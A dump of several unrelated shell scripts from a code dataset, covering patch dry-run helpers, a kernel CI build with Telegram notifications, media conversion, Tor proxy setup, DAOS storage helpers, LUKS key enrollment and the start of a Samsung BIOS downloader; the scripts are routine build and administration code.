## @return $?
function patchfile_verify_zero
{
  declare logfile=$1
  shift
  declare dir
  declare changed_files1
  declare changed_files2
  declare filename

  # Collect the paths named by the patch itself.
  # don't return /dev/null
  # see also similar code in change-analysis
  # shellcheck disable=SC2016
  changed_files1=$("${AWK}" 'function p(s){if(s!~"^/dev/null"&&s!~"^[[:blank:]]*$"){print s}}
    /^diff --git / { p($3); p($4) }
    /^(\+\+\+|---) / { p($2) }' "${INPUT_PATCH_FILE}" | sort -u)

  # maybe we interpreted the patch wrong? check the log file
  # shellcheck disable=SC2016
  changed_files2=$("${GREP}" -E '^[cC]heck' "${logfile}" \
    | "${AWK}" '{print $3}' \
    | "${SED}" -e 's,\.\.\.$,,g')

  # BUG FIX: the loop body previously used $(unknown) instead of
  # ${filename}; since `dirname ""` prints ".", every path "verified",
  # so the function always returned 0.
  for filename in ${changed_files1} ${changed_files2}; do
    # leading prefix = bad
    if [[ ${filename} =~ ^(a|b)/ ]]; then
      return 1
    fi

    # touching an existing file is proof enough
    # that pl=0 is good
    if [[ -f ${filename} ]]; then
      return 0
    fi

    dir=$(dirname "${filename}" 2>/dev/null)
    if [[ -n ${dir} && -d ${dir} ]]; then
      return 0
    fi
  done

  # ¯\_(ツ)_/¯ - no way for us to know, all new files with no prefix!
  yetus_error "WARNING: Patch only adds files; using patch level ${PATCH_LEVEL}"
  return 0
}
## @description  git apply dryrun
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to dryrun
function gitapply_dryrun
{
  declare patchfile=$1
  declare prefixsize=${2:-0}

  # Probe -p0 then -p1 until `git apply --check` accepts the patch, or stop
  # early if another method has already been selected.
  while [[ ${prefixsize} -lt 2
    && -z ${PATCH_METHOD} ]]; do
    if yetus_run_and_redirect "${PATCH_DIR}/input-dryrun.log" \
       "${GIT}" apply --binary -v --check "-p${prefixsize}" "${patchfile}"; then
      PATCH_LEVEL=${prefixsize}
      PATCH_METHOD=gitapply
      break
    fi
    ((prefixsize=prefixsize+1))
  done

  # A -p0 "success" can be a false positive when the patch only adds new
  # files; if verification fails, retry the probe starting at -p1.
  if [[ ${prefixsize} -eq 0 ]]; then
    if ! patchfile_verify_zero "${PATCH_DIR}/input-dryrun.log"; then
      PATCH_METHOD=""
      PATCH_LEVEL=""
      gitapply_dryrun "${patchfile}" 1
    fi
  fi
}
## @description  patch patch dryrun
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to dryrun
function patchcmd_dryrun
{
  declare patchfile=$1
  declare prefixsize=${2:-0}

  # Probe -p0 then -p1 with `patch --dry-run`, mirroring gitapply_dryrun.
  while [[ ${prefixsize} -lt 2
    && -z ${PATCH_METHOD} ]]; do
    # shellcheck disable=SC2153
    if yetus_run_and_redirect "${PATCH_DIR}/input-dryrun.log" \
       "${PATCH}" "-p${prefixsize}" -E --dry-run < "${patchfile}"; then
      PATCH_LEVEL=${prefixsize}
      PATCH_METHOD=patchcmd
      break
    fi
    ((prefixsize=prefixsize+1))
  done

  # Same -p0 false-positive guard as gitapply_dryrun: re-probe at -p1 when
  # the add-only verification fails.
  if [[ ${prefixsize} -eq 0 ]]; then
    if ! patchfile_verify_zero "${PATCH_DIR}/input-dryrun.log"; then
      PATCH_METHOD=""
      PATCH_LEVEL=""
      patchcmd_dryrun "${patchfile}" 1
    fi
  fi
}
## @description  driver for dryrun methods
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to dryrun
## @return 0 a method accepted the patch; 1 none did
function patchfile_dryrun_driver
{
  declare candidate=$1
  declare applier

  # Let the hinter narrow the candidate methods first.
  patch_file_hinter "${candidate}"

  #shellcheck disable=SC2153
  for applier in "${PATCH_METHODS[@]}"; do
    # Skip methods that do not match an explicit hint.
    if [[ -n "${PATCH_HINT}" && ! "${applier}" =~ ${PATCH_HINT} ]]; then
      continue
    fi

    if declare -f "${applier}_dryrun" >/dev/null; then
      "${applier}_dryrun" "${candidate}"
    fi

    [[ -z ${PATCH_METHOD} ]] || break
  done

  # Success iff some dryrun selected a method.
  [[ -n ${PATCH_METHOD} ]]
}
## @description  dryrun both PATCH and DIFF and determine which one to use
## @replaceable no
## @audience private
## @stability evolving
function dryrun_both_files
{
  # A git-format patch file carries far more metadata, so try it first.
  if [[ -f "${INPUT_PATCH_FILE}" ]] \
      && patchfile_dryrun_driver "${INPUT_PATCH_FILE}"; then
    INPUT_APPLY_TYPE="patch"
    INPUT_APPLIED_FILE="${INPUT_PATCH_FILE}"
    return 0
  fi

  if [[ -f "${INPUT_DIFF_FILE}" ]] \
      && patchfile_dryrun_driver "${INPUT_DIFF_FILE}"; then
    INPUT_APPLY_TYPE="diff"
    INPUT_APPLIED_FILE="${INPUT_DIFF_FILE}"
    return 0
  fi

  return 1
}
## @description  git patch apply
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to apply
function gitapply_apply
{
  declare patchfile=$1
  declare extraopts

  # When committing the result, let git normalize whitespace damage.
  if [[ "${COMMITMODE}" = true ]]; then
    extraopts="--whitespace=fix"
  fi

  echo "Applying the changes:"
  # NOTE: ${extraopts} is intentionally unquoted so that an empty value
  # disappears instead of becoming an empty argument to git.
  yetus_run_and_redirect "${PATCH_DIR}/apply-patch-git-apply.log" \
    "${GIT}" apply --binary ${extraopts} -v --stat --apply "-p${PATCH_LEVEL}" "${patchfile}"
  # Echo the log, minus git's per-file "Checking ..." noise.
  ${GREP} -v "^Checking" "${PATCH_DIR}/apply-patch-git-apply.log"
}
## @description  patch patch apply
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to apply
function patchcmd_apply
{
  declare pfile=$1
  declare applylog="${PATCH_DIR}/apply-patch-patch-apply.log"

  echo "Applying the patch:"
  yetus_run_and_redirect "${applylog}" \
    "${PATCH}" "-p${PATCH_LEVEL}" -E < "${pfile}"
  # Replay the captured patch(1) output for the console/report.
  cat "${applylog}"
}
## @description  driver for patch apply methods
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to apply
## @return 0 applied cleanly; 1 no method or apply failure
function patchfile_apply_driver
{
  declare pfile=$1
  declare gpgcheck=$2

  # Guard clause: the selected method must provide an _apply hook.
  if ! declare -f "${PATCH_METHOD}_apply" >/dev/null; then
    yetus_error "ERROR: Patching method ${PATCH_METHOD} does not have a way to apply patches!"
    return 1
  fi

  if ! "${PATCH_METHOD}_apply" "${pfile}" "${gpgcheck}"; then
    return 1
  fi
  return 0
}
| true |
85cb9b0e294dcb7647c3332253e39f1593284d11 | Shell | xyz-prjkt/xCircleCiScript | /.circleci/build.sh | UTF-8 | 3,595 | 3.25 | 3 | [] | no_license | #!/usr/bin/env bash
# Fetch build inputs: the kernel source (URL/codename come from CI env vars
# $kernel_source / $device_codename) and the xRageTC clang toolchain.
echo "Downloading few Dependecies . . ."
git clone --depth=1 $kernel_source $device_codename
git clone --depth=1 https://github.com/xyz-prjkt/xRageTC-clang clang
# Main
KERNEL_NAME=$kernel_name # IMPORTANT ! Declare your kernel name
KERNEL_ROOTDIR=$(pwd)/$device_codename # IMPORTANT ! Fill with your kernel source root directory.
DEVICE_CODENAME=$device_codename # IMPORTANT ! Declare your device codename
DEVICE_DEFCONFIG=$kernel_defconfig # IMPORTANT ! Declare your kernel source defconfig file here.
CLANG_ROOTDIR=$(pwd)/clang # IMPORTANT! Put your clang directory here.
export KBUILD_BUILD_USER=xyzuan # Change with your own name or else.
export KBUILD_BUILD_HOST=xyzscape-ci # Change with your own hostname.
# BUG FIX: IMAGE previously hard-coded ".../lavender/...", but the source is
# cloned into $device_codename, so builds for any other codename could never
# find their Image.gz-dtb. Derive it from KERNEL_ROOTDIR instead.
IMAGE=${KERNEL_ROOTDIR}/out/arch/arm64/boot/Image.gz-dtb
DATE=$(date +"%F-%S")   # NOTE(review): %F-%S omits hour/minute -- confirm intended.
START=$(date +"%s")     # Build start timestamp (seconds) for the duration report.
PATH="${PATH}:${CLANG_ROOTDIR}/bin"
# Checking environtment
# Warning !! Dont Change anything there without known reason.
# Prints a banner with the builder identity, defconfig, toolchain version and
# key directories. The echo arguments are deliberately unquoted; quoting them
# could change whitespace in the emitted log lines.
function check() {
echo ================================================
echo xKernelCompiler CircleCI Edition
echo version : rev1.5 - gaspoll
echo ================================================
echo BUILDER NAME = ${KBUILD_BUILD_USER}
echo BUILDER HOSTNAME = ${KBUILD_BUILD_HOST}
echo DEVICE_DEFCONFIG = ${DEVICE_DEFCONFIG}
echo CLANG_VERSION = $(${CLANG_ROOTDIR}/bin/clang --version | head -n 1 | perl -pe 's/\(http.*?\)//gs' | sed -e 's/ */ /g')
echo CLANG_ROOTDIR = ${CLANG_ROOTDIR}
echo KERNEL_ROOTDIR = ${KERNEL_ROOTDIR}
echo ================================================
}
# Compiler
# Announces the build on Telegram, runs the defconfig + kernel build with the
# clang toolchain, verifies the image exists, and stages it into AnyKernel.
function compile() {
# Your Telegram Group
curl -s -X POST "https://api.telegram.org/bot$token/sendMessage" \
    -d chat_id="$chat_id" \
    -d "disable_web_page_preview=true" \
    -d "parse_mode=html" \
    -d text="<b>xKernelCompiler</b>%0ABUILDER NAME : <code>${KBUILD_BUILD_USER}</code>%0ABUILDER HOST : <code>${KBUILD_BUILD_HOST}</code>%0ADEVICE DEFCONFIG : <code>${DEVICE_DEFCONFIG}</code>%0ACLANG VERSION : <code>$(${CLANG_ROOTDIR}/bin/clang --version | head -n 1 | perl -pe 's/\(http.*?\)//gs' | sed -e 's/ */ /g')</code>%0ACLANG ROOTDIR : <code>${CLANG_ROOTDIR}</code>%0AKERNEL ROOTDIR : <code>${KERNEL_ROOTDIR}</code>"
# Guard the cd: without it a failed clone would make us build in the wrong dir.
cd "${KERNEL_ROOTDIR}" || finerr
make -j$(nproc) O=out ARCH=arm64 ${DEVICE_DEFCONFIG}
make -j$(nproc) ARCH=arm64 O=out \
    CC=${CLANG_ROOTDIR}/bin/clang \
    CROSS_COMPILE=${CLANG_ROOTDIR}/bin/aarch64-linux-gnu- \
    CROSS_COMPILE_ARM32=${CLANG_ROOTDIR}/bin/arm-linux-gnueabi-
# Use -f (regular file) instead of the obsolete -a test operator.
if [ ! -f "$IMAGE" ]; then
    finerr
    exit 1
fi
git clone --depth=1 $anykernel AnyKernel
cp out/arch/arm64/boot/Image.gz-dtb AnyKernel
}
# Push
# Uploads the flashable zip produced by zipping() to the Telegram chat.
function push() {
# Abort instead of uploading a stray zip from the wrong directory.
cd AnyKernel || return 1
ZIP=$(echo *.zip)
curl -F document=@"$ZIP" "https://api.telegram.org/bot$token/sendDocument" \
    -F chat_id="$chat_id" \
    -F "disable_web_page_preview=true" \
    -F "parse_mode=html" \
    -F caption="Compile took $(($DIFF / 60)) minute(s) and $(($DIFF % 60)) second(s). | For <b>Xiaomi Redmi Note 7 (lavender)</b> | <b>$(${CLANG_ROOTDIR}/bin/clang --version | head -n 1 | perl -pe 's/\(http.*?\)//gs' | sed -e 's/ */ /g')</b>"
}
# Fin Error
# Reports a build failure to the Telegram chat, then terminates the script
# with a non-zero status.
function finerr() {
    local api="https://api.telegram.org/bot$token/sendMessage"
    curl -s -X POST "$api" \
        -d chat_id="$chat_id" \
        -d "disable_web_page_preview=true" \
        -d "parse_mode=markdown" \
        -d text="Build throw an error(s)"
    exit 1
}
# Zipping
# Bundles the AnyKernel tree into a flashable <kernel>-<codename>-<date>.zip.
function zipping() {
    local archive="${KERNEL_NAME}-${DEVICE_CODENAME}-${DATE}.zip"
    cd AnyKernel || exit 1
    zip -r9 ${archive} *
    cd ..
}
# Entry sequence: banner, build, package, then report the elapsed time and
# upload the result.
check
compile
zipping
END=$(date +"%s")
# Total build duration in seconds; push() formats it as minutes/seconds.
DIFF=$(($END - $START))
push
| true |
cf48f7962b7ba096f82ace037aa28f5bf6642888 | Shell | 010penetrator/dotfiles | /sh/conv_flac2mp3.sh | UTF-8 | 396 | 3.296875 | 3 | [] | no_license | #!/bin/bash
# Convert flac tracks to mp3 VBR0
# $1 is origin path
# $2 is destination
# NOTE: $2 is resolved AFTER cd-ing into $1, so a relative destination is
# interpreted relative to the origin directory -- TODO confirm intended.
if [ -z "$1" ] ; then set -- "." "${2}" ; fi
if [ -z "$2" ] ; then set -- "${1}" "." ; fi
# Abort if the origin directory is missing instead of converting the cwd.
cd "$1" || exit 1
drn=${PWD##*/}
mkdir -p "$2/$drn"
for f in *.flac; do
    # Skip the literal "*.flac" pattern when no flac files exist.
    [ -e "$f" ] || continue
    ffmpeg -i "$f" -qscale:a 0 "$2/$drn/$f.mp3"
done
# Copy any cover art alongside the converted tracks. The character classes
# previously read [C,c] etc., which also matched a literal comma.
cp *[Cc]over.* "$2/$drn/"
cp [Ff]ront.* "$2/$drn/"
cp [Ff]older.* "$2/$drn/"
cp [Bb]ack.* "$2/$drn/"
| true |
063149afc28dc75885c2df2ca9ab58474cf34295 | Shell | YvgenijSharovskij/Linux | /Linux-command-line-and-shell-scripting-bible-R-Blum-and-C-Bresnahan-2015/Chapters/Chapter7-Understanding_Linux_File_Permissions | UTF-8 | 2,536 | 4.34375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
###########################################################################################################
# CHAPTER 7:
# Understanding Linux File Permissions
#
#
# INDEX:
# file permissions (...)
# changing file permissions with chmod
# creating a shared group directory with SGID
#
#
###################################### file permissions (...)
#
# (...)
#
# format, e.g.:
# -rwxrwxrwx
#
# - for files
# d for directories
# l for links
# c for character devices
# b for block devices
# n for network devices
#
# read (r), write (w) and execute (x) permissions are set in specific order, as:
# 1) owner
# 2) group
# 3) everyone else
#
# default permissions are set as 2 with umask in the /etc/login.defs file, which uses octal format:
# Permissions Binary Octal Description
# --- 000 0 None
# --x 001 1 Execute-only
# -w- 010 2 Write-only
# -wx 011 3 Write and execute
# r-- 100 4 Read-only
# r-x 101 5 Read and execute
# rw- 110 6 Read and write
# rwx 111 7 Read, write, and execute
#
#
#
#
#
###################################### changing file permissions with chmod
#
# since default file permissions are set with umask as 2 (-w-),
# file permissions often need to be changed in order to e.g.
# execute bash files (...); do this with chmod:
#
# syntax:
# chmod options mode file
#
# format:
# [ugoa...][+-=][rwxXstugo...]
#
# where,
#
# [ugoa...]:
# u for the user
# g for the group
# o for others (everyone else)
# a for all of the above
#
# [+-=]:
# + to add to existing permissions
# - subtract from existing permissions
# = set to
#
# [rwxXstugo...]:
# X assigns execute permissions only if the object is a directory or
# if it already had execute permissions
# s sets the UID or GID (user or group ID)
# t saves program text
# u sets the permissions to u (user)
# g sets the permissions to g (group)
# o sets the permissions to o (others)
#
#
# for example, to add executable permissions to the user for file_name:
# chmod u+x file_name
#
#
#
###################################### creating a shared group directory with SGID
#
# for example, set the set-group-ID (SGID) bit so that a directory is shared by the group 'shared',
# and any newly created file in this directory belongs to that group as well:
# mkdir shared_dir
# chgrp shared shared_dir
# chmod g+s shared_dir
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
###########################################################################################################
| true |
4ca6678811775d3766345943e29e47ac35320d7e | Shell | dhonza/ne | /scripts/ale/build_merge.sh | UTF-8 | 514 | 3.171875 | 3 | [] | no_license | #!/bin/bash
FRAMES="frames001_001_2"

# Working directories: "all" for the merged montages, one tmp dir per layer.
mkdir -p all
mkdir -p tmp
mkdir -p tmp/l0
mkdir -p tmp/l1
mkdir -p tmp/l2

unzip ${FRAMES}.zip -d tmp
unzip ${FRAMES}_l0.zip -d tmp/l0
unzip ${FRAMES}_l1.zip -d tmp/l1
unzip ${FRAMES}_l2.zip -d tmp/l2

# Iterate with a glob instead of parsing `ls` output, and take the basename
# with parameter expansion instead of spawning sed per frame.
for f in tmp/*.png
do
    [ -e "$f" ] || continue
    echo "$f"
    g=${f##*/}
    echo "$g"
    # Side-by-side montage: base frame plus the three layer renderings.
    montage "tmp/$g" "tmp/l0/$g" "tmp/l1/$g" "tmp/l2/$g" -tile 4x1 -geometry 160x210+0+0 -filter box "all/$g"
done

# Encode the montage sequence into a video, then clean up.
cd all || exit 1
ffmpeg -y -i frame%06d.png ../${FRAMES}.m4v
cd ..
rm -rf all
rm -rf tmp
dca75cb248efc90b00a628a4f1e4a60cfa25ec07 | Shell | tungpd/text_corpus | /scripts/install_proxy.sh | UTF-8 | 911 | 2.984375 | 3 | [] | no_license | #!/bin/bash
set -e
SCRIPTS_DIR="$(pwd)"
ROOT_DIR="$SCRIPTS_DIR/.."

apt update
apt install -y tor
apt install -y netcat

# Enable the tor control port, protected by the (hard-coded) password "tor".
echo "ControlPort 9051" >> /etc/tor/torrc
echo HashedControlPassword $(tor --hash-password "tor" | tail -n 1) >> /etc/tor/torrc
tail -n 2 /etc/tor/torrc
service tor restart
service tor status
echo -e 'AUTHENTICATE "tor"' | nc 127.0.0.1 9051

apt install -y curl
# Show the real IP, then the IP as seen through tor.
curl http://ipv4.icanhazip.com/
torify curl http://ipv4.icanhazip.com/

cp ./change_ip.sh /usr/local/bin/
# Install the IP-rotation cron job. `crontab -l` exits non-zero when no
# crontab exists yet, which would abort the whole script under `set -e`,
# so tolerate that case; use mktemp instead of a predictable /tmp name.
cronfile="$(mktemp)"
crontab -l > "$cronfile" 2>/dev/null || true
echo '0 0 * * * /usr/local/bin/change_ip.sh' >> "$cronfile"
crontab "$cronfile"
rm -f "$cronfile"

# Build and configure polipo as an HTTP front-end for the tor SOCKS proxy.
cd "$ROOT_DIR/third_parties/polipo"
make all
make install
echo "socksParentProxy = 127.0.0.1:9050" >> /etc/polipo/config
echo 'diskCacheRoot=""' >> /etc/polipo/config
echo 'disableLocalInterface=true' >> /etc/polipo/config
cp "$SCRIPTS_DIR/polipo.service" /etc/systemd/system/
systemctl start polipo
systemctl status polipo
| true |
e62943224691b4235f29c42fb20144fdc5ac0153 | Shell | viveksjain/repro_rdd | /ec2/gen_data.sh | UTF-8 | 1,060 | 3.28125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
if [ "$#" -ne 1 ]; then
    echo "Usage: gen_data.sh <num slaves>"
    exit 1
fi
source ~/scripts/common.sh
set -e
# HDFS won't let you overwrite files/directories, so drop old paths first.
# (Run hdfs directly rather than via `if $(...)`, which relied on an obscure
# empty-command-substitution behavior for its exit status.)
if $HADOOP_INSTALL/bin/hdfs dfs -test -d /data; then
    $HADOOP_INSTALL/bin/hdfs dfs -rm -r /data
fi
if $HADOOP_INSTALL/bin/hdfs dfs -test -d /output; then
    $HADOOP_INSTALL/bin/hdfs dfs -rm -r /output
fi
$HADOOP_INSTALL/bin/hdfs dfs -mkdir /data
$HADOOP_INSTALL/bin/hdfs dfs -mkdir /output
# Generate k-means data, reusing a cached local copy when present.
if [ ! -f /tmp/kmeans.txt ]; then
    $SPARK_HOME/bin/spark-submit --class "KMeansDataGenerator" \
        --master $SPARK_MASTER \
        target/scala-2.10/data-generator_2.10-1.0.jar /tmp/kmeans.txt 10 60000000
fi
$HADOOP_INSTALL/bin/hdfs dfs -copyFromLocal -f /tmp/kmeans.txt $HDFS/data/kmeans_data
# Generate logistic-regression data. BUG FIX: the generator writes
# /tmp/lr.txt, but the cache check previously tested /tmp/lr_data.txt,
# which never exists locally -- forcing a full regeneration on every run.
if [ ! -f /tmp/lr.txt ]; then
    $SPARK_HOME/bin/spark-submit --class "LRDataGenerator" \
        --master $SPARK_MASTER \
        target/scala-2.10/data-generator_2.10-1.0.jar /tmp/lr.txt 10 60000000
fi
$HADOOP_INSTALL/bin/hdfs dfs -copyFromLocal -f /tmp/lr.txt $HDFS/data/lr_data
| true |
b8f2c3b388b305ce7b3084288387e3549f92b142 | Shell | veeraita/thesis-detecting-mtbi | /pipeline-tbi/ica/run_ica_manual.sh | UTF-8 | 475 | 3.03125 | 3 | [] | no_license | #!/bin/bash
# Locations of the raw MEG data and the processed pipeline output.
INPUT_DIR=/scratch/work/italinv1/tbi/meg
OUTPUT_DIR=/scratch/nbe/tbi-meg/veera/processed
echo "INPUT_DIR set as $INPUT_DIR"
echo "OUTPUT_DIR set as $OUTPUT_DIR"

# First positional argument selects the artifact type (ecg or eog).
AR_TYPE="$1"
if [ -z "$AR_TYPE" ]; then
    echo "Artifact type argument [ecg,eog] is required"
    exit 1
fi

FNAME="no_${AR_TYPE}_matches.txt"

# Reset the cluster module environment and activate the MNE conda env.
ml purge
module load teflon
ml anaconda3
source activate mne

python /scratch/nbe/tbi-meg/veera/pipeline/ica/run_ica_manual.py --file "${OUTPUT_DIR}/${FNAME}"
3a70b964438abbe759b32bc3d1fcfb94d93e1963 | Shell | hsjarbin/kubernetes-devops-security | /kubesec-scan.sh | UTF-8 | 1,113 | 3.234375 | 3 | [] | no_license | #!/bin/bash
#kubesec-scan.sh
# using kubesec v2 api
scan_result=$(curl -sSX POST --data-binary @"k8s_deployment_service.yaml" https://v2.kubesec.io/scan)
scan_message=$(curl -sSX POST --data-binary @"k8s_deployment_service.yaml" https://v2.kubesec.io/scan | jq .[0].message -r )
scan_score=$(curl -sSX POST --data-binary @"k8s_deployment_service.yaml" https://v2.kubesec.io/scan | jq .[0].score )
# using kubesec docker image for scanning
# scan_result=$(docker run -i kubesec/kubesec:512c5e0 scan /dev/stdin < k8s_deployment_service.yaml)
# scan_message=$(docker run -i kubesec/kubesec:512c5e0 scan /dev/stdin < k8s_deployment_service.yaml | jq .[].message -r)
# scan_score=$(docker run -i kubesec/kubesec:512c5e0 scan /dev/stdin < k8s_deployment_service.yaml | jq .[].score)
# Kubesec scan result processing
# echo "Scan Score : $scan_score"
if [[ "${scan_score}" -ge 5 ]]; then
echo "Score is $scan_score"
echo "Kubesec Scan $scan_message"
else
echo "Score is $scan_score, which is less than or equal to 5."
echo "Scanning Kubernetes Resource has Failed"
exit 1;
fi;
| true |
15c168aca60c363ccdbf43d1780ff8e23d9c141a | Shell | poussa/daos-setup | /env.sh | UTF-8 | 3,529 | 2.71875 | 3 | [] | no_license | export DAOS_PATH=/opt/src/daos-stack/daos
# Compiler/runtime search paths for the local DAOS install tree.
export CPATH=$DAOS_PATH/install/include:$CPATH
export PATH=$DAOS_PATH/install/bin:$DAOS_PATH/install/sbin:$PATH
# CaRT transport: plain sockets provider over the given fabric interface.
export CRT_PHY_ADDR_STR="ofi+sockets"
export OFI_INTERFACE=enp65s0f0
export VOS_BDEV_CLASS=nvme
# URI file published by orterun's --report-uri / consumed via --ompi-server.
export urifile=/tmp/report.uri
export LD_LIBRARY_PATH=$DAOS_PATH/install/lib:$DAOS_PATH/install/lib64:/usr/lib64
# PMEM namespaces to mount for SCM, and the service account used below.
PMEM_LIST="pmem1"
DAOS_USER=daos
DAOS_GRP=daos
# For mounting dfuse wo/ orterun
export DAOS_SINGLETON_CLI=1
export CRT_ATTACH_INFO_PATH=/tmp/
# Common orterun prefix used by the dmg/daos wrapper functions below.
ORTERUN="orterun --allow-run-as-root -np 1 --ompi-server file:${urifile}"
# Prepare SCM (persistent memory) for DAOS.
function _daos_prepare_pmem() {
    # PMEM devs need to be in interleaved AppDirect mode (one per socket)
    daos_server storage prepare --scm-only
}
# Prepare only the whitelisted NVMe device for SPDK use.
function _daos_prepare_nvme() {
    # Use only P4800x
    daos_server storage prepare --nvme-only --pci-whitelist 5e:00.0
}
# Format the prepared storage (interactive daos_shell).
function _daos_storage_format() {
    # rm -rf /mnt/daos
    # umount /mnt/daos
    # _daos_run_root
    daos_shell -i storage format
}
# Return the NVMe device from SPDK back to the kernel driver.
function _daos_reset_nvme() {
    daos_server storage prepare --nvme-only --reset
}
# List the storage devices daos_server can see.
function _daos_scan() {
    daos_server storage scan
}
# Create the daos user/group and hand them the mounted SCM filesystem.
function _daos_setup_user() {
    sudo adduser $DAOS_USER
    sudo passwd $DAOS_USER
    sudo groupadd $DAOS_GRP
    sudo usermod -a -G $DAOS_GRP $DAOS_USER
    # NOTE(review): every device in PMEM_LIST is mounted on the same
    # /mnt/daos mountpoint -- fine for the current single-entry list,
    # but confirm before adding more pmem devices.
    for dev in $PMEM_LIST; do
        sudo mount /dev/$dev /mnt/daos
        sudo chown $DAOS_USER.$DAOS_GRP /mnt/daos
    done
}
# Create the runtime socket directories for the server and agent.
function _daos_setup_dirs() {
    DIRS="/var/run/daos_agent /var/run/daos_server"
    for dir in $DIRS; do
        sudo mkdir $dir
        sudo chown $DAOS_USER $dir
        sudo chmod 0774 $dir
    done
}
# Launch daos_server (non-root) under orterun with recovery enabled; the
# server URI is written to report.uri for clients to attach.
function _daos_run() {
    orterun \
        -np 1 \
        --hostfile hostfile \
        --enable-recovery \
        --report-uri report.uri \
        daos_server \
        -t 1 \
        -i \
        -o /home/spoussa/src/daos-config/daos_server_wolfpass4.yaml
}
# Same as _daos_run but as root, insecure transport, explicit start command,
# and attach info written under /tmp (matches CRT_ATTACH_INFO_PATH above).
function _daos_run_root() {
    orterun \
        --allow-run-as-root \
        -n 1 \
        --hostfile hostfile \
        --enable-recovery \
        --report-uri /tmp/report.uri \
        daos_server \
        --insecure \
        -t 1 \
        --config=/home/spoussa/src/daos-config/daos_server_wolfpass4.yaml \
        start \
        -a /tmp
}
# Start the client-side agent with the matching (insecure) configuration.
function _daos_agent_run() {
    daos_agent \
        --insecure \
        -o /home/spoussa/src/daos-config/daos_agent_wolfpass4.yaml
}
# Create a 10G pool; prints the pool UUID used by the functions below.
function _daos_pool_create() {
    $ORTERUN dmg create --size=10G
}
# Destroy the pool given as $1 (pool UUID).
function _daos_pool_destroy() {
    $ORTERUN dmg destroy --pool $1
}
# Query pool $1 via service replica 0.
function _daos_pool_query() {
    $ORTERUN dmg query --svc 0 --pool $1
}
# Query the container behind the fixed /tmp/container-1 path.
function _daos_container_list() {
    #$ORTERUN daos pool list-containers --pool $1 --svc 0 # not implemented yet
    daos container query --svc=0 --path=/tmp/container-1
}
# Create a POSIX container in pool $1.
function _daos_container_create() {
    # example pool UUID: 3838f949-bd7f-491c-939a-b8a61a0bd373
    $ORTERUN daos container create --pool=$1 --type=POSIX --svc=0
}
# Create a POSIX container in pool $1 bound to /tmp/container-1 with an
# explicit object class and chunk size.
function _daos_container_create_with_path() {
    # example pool UUID: 3838f949-bd7f-491c-939a-b8a61a0bd373
    $ORTERUN daos container create --pool=$1 --type=POSIX --svc=0 --path=/tmp/container-1 --oclass=S1 --chunk_size=4K
}
# Mount container $2 of pool $1 on /tmp/daos via the high-level dfuse shim.
function _daos_mount_hl() {
    # p: 3838f949-bd7f-491c-939a-b8a61a0bd373
    # c: bfd123ba-7b83-4b3b-aa41-8601d4d9cb58
    $ORTERUN dfuse_hl /tmp/daos -o default_permissions -s -f -p $1 -c $2 -l 0 &
    mount -t fuse
}
# Mount container $2 of pool $1 on /tmp/daos with plain dfuse (singleton mode).
function _daos_mount() {
    dfuse -p $1 -c $2 -s 0 -m /tmp/daos -S
}
# Unmount the dfuse filesystem.
function _daos_umount() {
    fusermount -u /tmp/daos
}
# Run the DAOS regression test suite.
function _daos_test() {
    $ORTERUN daos_test
}
| true |
3f348ab741a39e0fff9f3e17852403c79a16ef55 | Shell | geekman/dracut-gmcrypt | /90zgmcrypt/add-key.sh | UTF-8 | 1,251 | 4.34375 | 4 | [] | no_license | #!/bin/bash
#
# generates the system key and adds it into the specified LUKS volume
# this needs to be run on the SAME system that is used to generate the key!
#
# usage: add-key.sh <dev>
#
DEV=$1
# NOTE(review): test's -o operator is obsolescent; [ -z ] || [ ! -b ] would
# be the modern form.
if [ -z "$DEV" -o ! -b "$DEV" ]; then
    echo "usage: `basename $0` <luks-dev>"
    exit 1
fi

# include the lib
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
source $SCRIPT_DIR/gmcrypt-lib.sh

# Sanity-check the target before touching any key slots.
if ! cryptsetup isLuks "$DEV" 2>/dev/null; then
    echo "$DEV is not a LUKS device"
    exit 1
fi

# Derive the device identifier used for key generation; a too-short value
# means cryptsetup did not return a real UUID.
DEV_UUID=luks-$(cryptsetup luksUUID "$DEV")
if [ ${#DEV_UUID} -lt 10 ]; then
    echo "cryptsetup returned UUID is too short: $DEV_UUID"
    exit 1
fi

# Keyfile is written to a private temp file and removed on any exit path.
TMPFILE=$(mktemp -q /tmp/keyfile.rootfs.XXXXXXXXXX) || exit 1
trap "rm -f $TMPFILE" EXIT

#
# show user key slots and ask if we should remove slot 1
#
echo
cryptsetup luksDump $DEV | grep -i "slot\|header"

# NOTE(review): read without -r mangles backslashes in the answer; harmless
# for y/n input but -r would be safer.
read -p "Should I remove key from slot 1? " removeKey
case $removeKey in
    [Yy])
        echo "Wiping key slot #1..."
        cryptsetup luksKillSlot $DEV 1
        ;;
esac

#
# generate and add key
#
echo
echo "Generating key and adding it to ${DEV}..."
# gmcrypt_genkey comes from gmcrypt-lib.sh; only add the key if generation
# succeeded.
gmcrypt_genkey "$TMPFILE" "$DEV_UUID" &&
    cryptsetup luksAddKey --iter-time 3000 "$DEV" "$TMPFILE"

echo "Done."
| true |
c0822c006c2299d6ae5a6acf385cc3a97b2d725e | Shell | srsman/bios-downloader | /modules/vendor-samsung.sh | UTF-8 | 3,778 | 3.90625 | 4 | [] | no_license | #!/bin/sh
# Please source common.sh before this file.
# Advertise this module's download method only when the DMI vendor string
# starts with "Samsung"; otherwise the variable ends up empty and is unset.
BIOS_DOWNLOAD_METHOD_SAMSUNG="$(echo $VENDOR|grep -i "^Samsung" >/dev/null && echo "get_bios_samsung" || true)"
# Inputs this method can use to locate a BIOS package.
BIOS_DOWNLOAD_METHODREQS_SAMSUNG="current-bios-version|samsung-platform-id"
if [ -z "$BIOS_DOWNLOAD_METHOD_SAMSUNG" ]; then
    unset BIOS_DOWNLOAD_METHOD_SAMSUNG
fi
# Cached statistics mapping BIOS-version shapes to PlatformID calc schemes.
SAMSUNG_STATS="$WDIR/Samsung-PlatformID-stats.txt"
# Ask Samsung's BIOS update web service which firmware file corresponds to a
